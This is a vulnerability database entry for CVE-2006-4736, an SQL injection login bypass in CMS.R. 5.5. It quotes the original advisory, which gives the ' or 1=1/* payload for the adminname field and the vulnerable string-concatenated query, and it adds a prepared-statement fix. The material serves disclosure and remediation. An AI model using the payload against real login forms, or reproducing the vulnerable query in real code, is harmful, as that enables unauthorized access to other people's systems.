CMS.R. 'Index.PHP' SQL Injection Vulnerability

Vulnerability ID: 1193538 Vulnerability type: SQL injection
Published: 2006-09-13 Updated: 2006-09-25
CVE ID: CVE-2006-4736 CNNVD-ID: CNNVD-200609-194
Platform: N/A CVSS score: 7.5
|Vulnerability source
https://cxsecurity.com/issue/WLB-2006090091
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200609-194
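|Vulnerability details
Multiple SQL injection vulnerabilities exist in index.php in CMS.R. 5.5. A remote attacker can execute arbitrary SQL commands via the (1) adminname and (2) adminpass parameters.
|Vulnerability exploit (EXP)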
Hello

Title : CMS.R. the Content Management System admin authentication baypass

Discovered by : HACKERS PAL

Copyrights : HACKERS PAL

Website : WwW.SoQoR.NeT

Email : security (at) soqor (dot) net

The Vulnerability works 100% with magic_quotes_gpc = off

put the user name value (' or 1=1/*)

[code]

' or 1=1/*

[/code]

and you will login :)

error file : index.php

line : 48

query :-

[code]

$query = "SELECT * From ".$config->get("TABLE_USER")." where BINARY username='".$_POST['adminname']."' AND BINARY pass='".$_POST['adminpass']."'";

[/code]

solution:-

replace

[code]

$query = "SELECT * From ".$config->get("TABLE_USER")." where BINARY username='".$_POST['adminname']."' AND BINARY pass='".$_POST['adminpass']."'";

[/code]

with

[code]

//

//	Fixed By : HACKERS PAL

//                        WwW.SoQoR.NeT

//

$query = "SELECT * From ".$config->get("TABLE_USER")." where BINARY username='".addslashes($_POST['adminname'])."' AND BINARY pass='".addslashes($_POST['adminpass'])."'";

[/code]

WwW.SoQoR.NeT
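
The fix quoted above escapes the two POST values with addslashes(), which is not aware of the connection character set; binding the values as parameters keeps them out of the SQL text altogether. The following is an added example, not code from CMS.R. or from the advisory: it assumes PDO with an in-memory SQLite database so it runs stand-alone, and the table name `cmsr_users`, the function `find_admin` and the sample row are hypothetical (MySQL's BINARY keyword is omitted because SQLite compares text case-sensitively by default).

```php
<?php
// Added example: not code from CMS.R. or from the advisory.
// Assumptions: PDO + in-memory SQLite stand in for the MySQL database;
// the table name and the row below are constructed sample data.

const ALLOWED_USER_TABLES = ['cmsr_users']; // hypothetical table name

function find_admin(PDO $db, string $table, $name, $pass): ?array
{
    // Identifiers cannot be bound, so the configured table name is allow-listed.
    if (!in_array($table, ALLOWED_USER_TABLES, true)) {
        throw new InvalidArgumentException('unexpected table name');
    }
    // Reject non-string input (e.g. adminname[]=x) before it reaches the query.
    if (!is_string($name) || !is_string($pass)) {
        return null;
    }
    // Placeholders keep the SQL text fixed; the values travel separately.
    $stmt = $db->prepare("SELECT * FROM $table WHERE username = :u AND pass = :p");
    $stmt->execute([':u' => $name, ':p' => $pass]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE cmsr_users (username TEXT, pass TEXT)');
$db->exec("INSERT INTO cmsr_users VALUES ('admin', 'constructed-sample-pass')");

// The advisory's input is compared as a literal username and matches no row.
var_dump(find_admin($db, 'cmsr_users', "' or 1=1/*", 'anything') === null);
// The stored credentials still match.
var_dump(find_admin($db, 'cmsr_users', 'admin', 'constructed-sample-pass') !== null);
```
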
|References

Source: XF
Name: cmsr-index-sql-injection(28877)
Link: http://xforce.iss.net/xforce/xfdb/28877
Source: BID
Name: 19950
Link: http://www.securityfocus.com/bid/19950
Source: BUGTRAQ
Name: 20060911 CMS.R. the Content Management System admin authentication baypass
Link: http://www.securityfocus.com/archive/1/archive/1/445789/100/0/threaded
Source: VUPEN
Name: ADV-2006-3561
Link: http://www.frsirt.com/english/advisories/2006/3561
Source: SECUNIA
Name: 21860
Link: http://secunia.com/advisories/21860
Source: SREASON
Name: 1563
Link: http://securityreason.com/securityalert/1563